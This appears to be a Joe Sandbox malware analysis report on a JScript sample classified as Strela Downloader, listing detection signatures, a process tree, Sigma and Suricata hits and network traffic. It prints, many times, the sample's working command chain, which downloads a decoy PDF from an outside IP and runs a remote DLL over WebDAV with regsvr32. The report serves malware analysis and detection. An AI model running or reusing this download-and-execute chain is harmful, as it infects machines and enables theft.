Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
31070304561863532281.js

Overview

General Information

Sample name:31070304561863532281.js
Analysis ID:1591694
MD5:6cc584b9b824d773a00397451bf43e6b
SHA1:d189ff72702e7a9e4aa86ff29bfbbe661eb75e18
SHA256:55dc3a23d0b77ee932e1ff42d35b61784d99325d97b67149d51d71d4604de3f8
Tags:jsuser-JAMESWT_MHT
Infos:

Detection

Strela Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
Yara detected Strela Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Gathers information about network shares
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 7336 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7388 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7440 cmdline: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Acrobat.exe (PID: 7616 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7824 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 8028 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1704,i,14534165756939046791,6243001767822148807,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • cmd.exe (PID: 7632 cmdline: cmd /c net use \\193.143.1.205@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 7660 cmdline: net use \\193.143.1.205@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • svchost.exe (PID: 7896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 7336JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7388, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7440, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7388, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7440, ProcessName: powershell.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ProcessId: 7336, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.205, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 7660, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ProcessId: 7388, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Hieu Tran: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ProcessId: 7388, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ProcessId: 7388, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ProcessId: 7388, ProcessName: cmd.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7388, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7440, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ProcessId: 7388, ProcessName: cmd.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ProcessId: 7336, ProcessName: wscript.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7388, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7440, ProcessName: powershell.exe
    Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7632, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 7660, ProcessName: net.exe
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7896, ProcessName: svchost.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7632, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 7660, ProcessName: net.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll, ProcessId: 7388, ProcessName: cmd.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T10:09:06.418938+010028595601Malware Command and Control Activity Detected192.168.2.449730193.143.1.20580TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T10:09:08.469985+010018100051Potentially Bad Traffic192.168.2.449731193.143.1.2058888TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T10:09:06.418938+010018100002Potentially Bad Traffic192.168.2.449730193.143.1.20580TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 31070304561863532281.jsVirustotal: Detection: 11%Perma Link

    Software Vulnerabilities

    barindex
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    Networking

    barindex
    Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.4:49731 -> 193.143.1.205:8888
    Source: Network trafficSuricata IDS: 2859560 - Severity 1 - ETPRO MALWARE StrelaStealer CnC Activity - Requesting Decoy Payload (GET) : 192.168.2.4:49730 -> 193.143.1.205:80
    Source: httpBad PDF prefix: HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Wed, 15 Jan 2025 09:09:06 GMT Content-Type: application/pdf Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 36 20 38 34 30 2e 39 36 20 5d 20 2f 50 61 72 65 6e 74 20 33 20 30 20 52 20 2f 52 65 73 6f 75 72 63 65 73 20 36 20 30 20 52 20 2f 53 74 72 75 63 74 50 61 72 65 6e 74 73 20 30 20 2f 54 79 70 65 20 2f 50 61 67 65 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 35 20 30 20 6f 62 6a 0a 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 37 35 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 54 30 00 42 5d 43 20 61 61 62 a0 67 69 a6 90 9c cb 55 c8 65 a8 00 82 45 e9 0a fa 89 06 0a e9 c5 5c 20 45 a6 96 26 40 79 43 a8 3a a0 6c aa 42 1a 57 a0 42 21 50 39 44 95 82 7e 85 b9 82 4b 3e 57 20 10 02 00 26 99 12 f1 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 36 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 3e 3e 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 78 37 20 37 20 30 20 52 20 3e 3e 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 37 20 30 20 6f 62 6a 0a 3c 3c 20 2f 42 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 31 20 5d 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 52 65 73 6f 75 72 63 65 73 20 38 20 30 20 52 20 2f 53 75 62 74 79 70 65 20 2f 46 6f 72 6d 20 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 20 2f 4c 65 6e 67 74 68 20 35 39 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 2b e4 0a 54 28 e4 d2 4f 2f 36 50 48 2f e6 2a e4 32 b5 34 d1 b3 34 53 30 00 42 5d 0b 13 03 08 1b ca 48 ce e5 d2 4f 04 a9 53 d0 af 30 34 54 70 c9 e7 0a 04 42 00 f1 ec 0e 9e 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 20 2f 45 78 74 47 53 74 61 74 65 20 3c 3c 20 2f 61 30 20 3c 3c 20 2f 43 41 20 31 20 2f 63 61 20 31 20 3e 3e 20 2f 67 73 30 20 3c 3c 20 2f 42 4d 20 2f 4e 6f 72 6d 61 6c 20 2f 43 41 20 31 2e 30 20 2f 53 4d 61 73 6b 20 2f 4e 6f 6e 65 20 2f 6
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 8888
    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49731
    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 193.143.1.205:8888
    Source: Joe Sandbox ViewIP Address: 193.143.1.205 193.143.1.205
